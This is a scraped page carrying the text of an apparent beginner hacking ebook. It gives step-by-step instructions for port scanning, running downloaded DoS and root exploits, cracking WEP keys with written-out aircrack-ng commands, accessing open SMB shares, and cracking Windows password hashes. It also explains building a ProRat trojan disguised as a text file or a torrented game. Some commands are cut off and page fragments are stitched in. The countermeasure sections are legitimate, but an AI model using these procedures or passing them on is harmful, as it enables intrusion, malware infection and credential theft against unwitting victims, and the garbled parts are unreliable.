Read them and become a Famous Et See more hical Hacker. Already have an account? Sign In. See more. Views : Added : 4 years ago. About the Author piyush bansal Visit Profile.
Attachments 45 Ask a question. Advance Hacking Exposed Part 6. Backtrack Advance Hacking tutorials. Beginners Hackers and tutorials. Black Book of Viruses and Hacking. Certified Ethical Hacker Study Guide. Cross Site Scripting and Hacking Websites. Dangerours Google Hacking Database and Attacks. Ethical Hacking Complete E-book for Beginners. Ethical Hacking Value and Penetration testing. G-mail Advance Hacking Guides and Tutorials.
Hack the System for beginners. Hack your Friend using Backtrack. Hacking attacks and Examples Test. Hacking Computer Systems and Tutorials. Hacking into Computer Systems. Hacking Website Database and owning systems. Network Hacking and Shadows Hacking Attacks.
Penentration Testing With Backtrack 5. Reverse Engineering for Beginners. Social Engineering To protect yourself from social engineering attacks like the one discussed in this chapter you must learn to question the possible attacker. Some professional social engineers study the company before attacking, so they might know all the answers.
Better safe than sorry. Shoulder Surfing When you type in your password make sure there is no one behind you attempting to peak. No not really. Dictionary Attacks Dictionary attacks are very simple to prevent. Some people may think that if they use a word from the dictionary but replace most of the letters with a number, then they are safe. They are not.
Brute-force Attacks Brute-force attacks may be prevented by creating a very long password and using many numbers and odd characters. The longer the password the longer it takes for the hacker to crack your password. Like I said in the dictionary attacks, creating a phrase for your password is your best option for staying secure. Creating tables for passwords that are long takes a very long time and a lot of resources.
Phishing Phishing attacks are very simple to avoid. When you are asked to put your personal information into a website, look up into the URL bar. If for example you are supposed to be on Gmail.
When you are on the real Gmail website, the URL should begin with www. Footprinting is the first step hackers take in their hacking process. Footprinting is important because to hack a system the hacker must first know everything there is to know about it. Below I will give you examples of the steps and services a hacker would use to get information from a website. First, a hacker would start gathering information on the targets website. Things a hacker would look for are e-mails and names.
This information could come in handy if the hacker was planning to attempt a social engineering attack against the company. Next the hacker would get the IP address of the website. Next the hacker would Ping the server to see if it is up and running. If all packets went through, then the server is up. Next the hacker would do a Whois lookup on the company website. As you can see this gives a HUGE amount of information about the company.
You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more! A hacker can also take advantage of search engines to search sites for data. You could narrow down the number of results by adding a specific word after. This search could list several emails that are published on the website.
Now that the basics of footprinting have been explained, we will move on to port scanning. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website.
In the port scanning example we will use the most popular port scanner: Nmap. Otherwise known as Zenmap. First the hacker would choose a target and place it in the target box. This is what the command would look like if you were running the CLI version. A smart hacker would go with a quick and quiet scan. Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because as you will see later on, there are other ways to get that information.
A sample scan result may look like the following: 4. As you can see it found a few open ports and listed the services that are run on them.
Along with finding out what ports are running, the hacker needs to also find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. As you can see, there is an option on Nmap to detect the operating system, but this scan is very loud and easily detected so it is better to avoid it if possible.
A simple way to determine what the server is running is by getting a error page. On most sites the error page displays the server operating system along with its version. Now that the hacker has got all the running services and open ports on the targets system, he will now have to find out what versions the server is running.
One way the hacker can get this information, is to telnet into service port. If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps. The telnet command should now be installed 1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit.
As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command: telnet www. So a hacker would insert a target URL in place of localhost.
Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered. Searching for Vulnerabilities Now that the hacker has the name of the software being used and its version number, he would take that information and search a couple vulnerability databases for an exploit. If a skillful hacker is determined, he may try to locate a vulnerability in the current software version and develop an exploit for it.
You might be wondering why 0-days are worth so much. Denial-of-Service DoS — There are many types of DoS attacks, but they all have one purpose: to make the target server unavailable for legitimate users. The most common type of DoS attack is when the hacker sends a flood of information to the target server causing it to use up all of its resources, and in return pushing it offline, or causing it to deny requests from legitimate users trying to access it.
Buffer Overflow BoF — A buffer overflow happens when a program attempts to store more data into a buffer, or a data storage area, then it was meant to hold. Because the buffer was only meant to hold a certain amount of data, the extra information overflows into other buffers causing them to be overwritten with malicious code created by the hacker.
Once this code is executed, the hacker can receive full control of the server. Below are their definitions: Local Exploit — To run a local exploit, you must first have access and privileges on the machine. Local exploits are usually used to escalate ones privileges to admin or root. In other words, it allows an ordinary user to gain root privileges.
A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack, and then be able to escalate to root privileges with the help of a local exploit. Penetrating So now you might be wondering: Once the hacker finds the right exploit, how does he go about running it against the target and penetrating the server?
This will all be explained in this chapter. As you search Milw0rm or any of the other couple exploit database websites provided in this chapter, you will notice that the exploits are created in many different types of programming languages.
Below I will list a few of the most common programming languages used, and how a hacker would compile and run them against a server. Below are the steps the hacker would take. First the hacker would need to install PHP onto his computer. Every exploit is different. Some you have to know what to edit and some have runtime instructions. Next open up the command prompt or terminal if you are using a Mac, and go to the PHP directory by using the CD change directory command followed by the directory location.
You should get a couple errors. The above is a simple example. Also every now and then you will receive other errors such as the one the second picture shows above. These errors have to do with the server configurations. Now as a hacker, you have to learn a lot on your own. By going around asking simple questions like this all the time will make you look bad and the most common response you will receive: www. Google is your friend, so take advantage of it!
So starting now, begin to use Google, and if you are still stuck, then you can ask help on community forums. Once the errors are fixed and the program is running, a DoS attack will be launched the target website up until you exit the command screen. Eventually the server may go down completely. Download and install the appropriate version of ActivePerl. Next the hacker would find an exploit for vulnerability.
This is also a Denial of Service DoS exploit. Edit the options like the target server and others as needed. The attack has begun. Python Python is also a common programming language used in creating exploits. The steps to running a Python exploit are just as easy as the ones for Perl. Hint: Python files end with. You can usually find this information commented in the top of the script.
Below is a list of the most popular compilers for each operating system. Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in windows. Open up Terminal. You should see the following screen: 4. You are now in insert mode. Right click and paste in the exploit. The script should have pasted in. This quits and saves the document as exploit. Now type in the command: ls. This command lists all the files in the current directory.
You should see your newly made file in the list. This command downloads the package and then asks you if you would like to continue with installing. It automatically will install the package. If there was no error displayed, then it was successful. This will display a little note telling you how to run the exploit against a server.
The below image shows all of these steps together. The last line of the picture shows the proper way a hacker would use the script against a server. Below is an image of what the root account on Ubuntu would look like. In this case I am root. Run the installer. Choose to install from the internet. Continue on until it asks you to choose a mirror to download from. Choose any. Next you must select packages to download.
Expand the window so that you can see all of the columns. It will begin to install the packages 8. Once it is installed, double click the desktop icon and a command prompt should come up. It will now display the scripts runtime directions.
Put in the right options and parameters and run the script again. The picture below shows all of these steps being done. Once a hacker runs this script against a vulnerable machine and the script works, he will have root access to the target computer. Many exploits are created and tested in specific environments and the expected outcome only happens when the exploit is run in the exact same environment.
That is another reason why programming knowledge is needed, so you could edit the exploit script to work for you. Once a skilled hacker gains root to a server he has the ability to do a lot of damage. Countermeasures There are a few things you can do to stay secure from network hacking attempts. Keep all your software up to date. There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out.
Implement a firewall. This will keep most of the bad data out and good data in. Install anti-virus software. Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system.
You can get internet access with a wireless enabled laptop almost everywhere you go. In this chapter I will discuss ways a hacker goes about getting into secure wireless networks and things he can do once he is inside. The hacker starts by scanning for wireless networks near him. The Windows tool we will use in this section is called NetStumbler. Also by the time you receive this eBook MacStumbler may already be released for those of you using a Mac.
Download and install NetStumbler. Run it. It automatically starts to scan for wireless access points. Once it is completed, you should see a list of all the wireless access points around you. The more green and the less spaces, the better the signal. It provides the MAC address, Channel number, encryption type, and a bunch more. All of these come in use when a hacker decides he wants to get in the secured network by cracking the encryption.
Backtrack comes with a huge list of preloaded software for this very purpose. Before we begin, there are a couple requirements: 1. You need a computer with a compatible wireless adapter.
Download Backtrack and create a Live CD. First we will find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet.
It may ask you for the appropriate adapter which in my case is ath0. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.
Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Once you find an access point, open a text document and paste in the networks broadcast name essid , its mac address bssid and its channel number. The next step is to start collecting data from the access point with airodump.
Open up a new terminal and start airodump by typing in the command: airodump-ng -c [channel ] -w [filename] --bssid [bssid] [device] In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after --bssid.
The command ends with the device name. Make sure to leave out the brackets. Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase.
Put in the following command: aireplay-ng -1 0 -a [bssid] -h -e [essid] [device] In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point.
The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name essid of the target access point, and the command ends with the your wireless adapters device name. Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key.
Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. Once you have collected around 50kk packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is: aircrack-ng -a 1 -b [bssid] -n [filename]. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key. With all the different computers and network adapters out there, you may come across a error occasionally.
If you get stuck, remember, Google is your friend! Packet sniffing is the act of capturing packets going through a network. With a packet sniffer, once a hacker gains access to wireless network he could intercept private information going through a network such as: usernames, passwords, IM conversations, and e-mails. Download and install Wireshark. Launch it and click on the option to list the available capture interfaces as shown below. Next choose the target to begin to capture their packets and click on start.
Many captured packets shows that the user is currently active. Now to show you an example of how Wireshark can be used I will start up Windows Live and send a message. As you will see in the image below, my whole conversation will be captured. As you can see, my message is displayed at the bottom. If I continue down the list I can see the whole conversation. Change your routers default password and make sure you have WAP encryption enabled.
It is better than nothing. Use a long secure password for your router. Include numbers, lowercase letters, uppercase letters and other symbols. The more obscure the better. Make sure your router has the option to not broadcast your SSID enabled. This will prevent some programs like Net Stumbler from locating your wireless network. Use MAC filtering on your router. Every wireless card and wireless adapter has a MAC address. By choosing to allow only your MAC addresses onto the network, you can keep a lot of attackers out.
To prevent packet sniffing attacks from affecting you, make sure the important sites you use, like banks, use SSL Secure Socket Layer encryption. The only thing required is for the target machine to have file and printer sharing enabled and to have port open. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner. Download and install it. Next the hacker would insert the IP range he would like to scan.
Click the downward arrow on the right and check the Scan ports box. A popup will come up asking you if you would like to select a new port. Click YES. Type in the port number into the first box and click OK.
Click start. As you can see Ips were scanned. Out of those only one was alive and luckily it has port open. Without it, this attack is not possible.
This means that file and printer sharing is enabled. This command will display any shared drives, folders, files or printers. In my case, I got the following: In my example, I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk. To gain access to my SharedDocs disk, the hacker would have to map out the drive onto his computer.
If successful, the hacker will have all the contents of my drive on his computer. This just tells the computer what to name the drive on your computer. Looks like I already have a drive G. To avoid this problem, go to My Computer where it will show all of your current Drives. To fix this simply change the letter G to a nonexistent drive letter. Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double clicking it brings up all of the targets documents.
Ophcrack is a Windows only password cracker, and it uses rainbow tables to get the job done quickly. Windows uses a couple a couple types of hashes. One of them is the LM Lan Manager hash.
If a password is longer than seven characters, then it is split into seven character chunks, made into all uppercase, and then hashed with the DES encryption. Because it is split into parts and made all uppercase, the total number of different password combinations goes down significantly, and makes it easier for hackers to crack the password. So you might be wondering, how can I get a copy of those hashes? There are a couple ways.
First download and install ophcrack. As you can see there are two versions. In this example we will be using the program itself in windows, so download the first option. Once you have it downloaded, install it. When the option comes up to download rainbow tables, unclick them all and just install the program.
It is better to download the rainbow tables separately. Once it is installed, go to the ophcrack website and click on Tables in the navigation. This will display all the tables you can download. As you can see, the more characters covered, the bigger the table gets. Choose the correct table for your operating system. In the example, I chose the largest possible free table. Next run ophcrack and click on tables.
Select the table you downloaded and click Install to locate the file on your computer. Hit OK to continue. Make sure all of your anti-virus and anti-spyware programs are disabled because most anti-virus programs mistake PWDUMP for a malicious program since it accesses the system files. This will load all the password hashes for all the users on your computer and display them.
Next click Crack and the program will begin to crack the password hashes. Go to the ophcrack website and choose the correct operating system LiveCD to download. With the downloaded. If this also fails, go into Ophcrack Text mode. Once it ophcrack loads completely, it will automatically get your Windows password hashes and begin the cracking process. Network Connection 2.
Everyday thousands of innocent people are getting infected by different types of malware. The most common types of malware today are viruses, worms and Trojans. In this chapter we will discuss all the types of malware, and give you an example of a windows trojan in use. The reason we will use Windows is because malware is very rare in Linux and Mac computers. Definitions 1. Viruses — Viruses cannot spread without the help of us humans.
They are like parasites because they need a host to attach themselves to. The host is usually a legitimate looking program or file. Once this program is launched, the virus is executed and infects other files on your computer.
Viruses can be very destructive. They can do damage to your computer hardware, software and files. Viruses are spread through the sharing of files and are many times sent within emails via attachments.
Worms — A worm is a malicious program that can replicate itself onto other computers on a network. Once it infects a system, it uses that system to send out other copies of itself to other random systems attempting to infect them. Trojan Horse — A trojan horse is a malicious program that can be used to do silly things to a system like changing its desktop, mess with the user interface, and take control of your mouse.
It can also be used for some serious things like accessing your data, erasing your files, stealing your passwords, and capturing your keystrokes. Logic Bombs — Logic bombs are usually pieces of code that are programmed into a program that lie dormant until a certain time or until a user does a certain action which causes it to be executed. Bacteria — Bacteria make many copies of themselves and eventually end up taking up all of the computers recourses such as all of its processor power, memory and disk space.
This results in the legitimate user losing access to those resources. Blended Threats — Blended threats combine all of the characteristics of the above and use them along with system vulnerabilities to spread and infect machines. Download ProRat.
Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. Open up the program. Next we will create the actual Trojan file. Next put in your IP address so the server could connect to you. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.
Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name.
As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to.
In the example I will use an ordinary text document. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document. Finally click on Create Server to, you guessed it, create the server file.
Below is what my server file looks like. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.
Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.
Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more.
The image below shows the message I would get on my screen if the hacker chose to message me. Below is an image of my task bar after the hacker clicks on Hide Start Button. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti- virus programs. Countermeasures There are a couple things you can do to prevent yourself from being infected by the malware discussed in this chapter.
Make sure you have good and up-to-date anti-virus software installed on your computer. Also if there is an automatic update option on your anti- virus software, make sure it is enabled. Make sure you have a firewall installed on your computer and make sure that it is actually enabled.
Firewalls protect against unauthorized inbound and outbound connections. Many of the web applications that run these dynamic websites have security flaws. In this chapter, we will discuss some of the most popular forms of attacks against web applications.
Local — Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer.
0コメント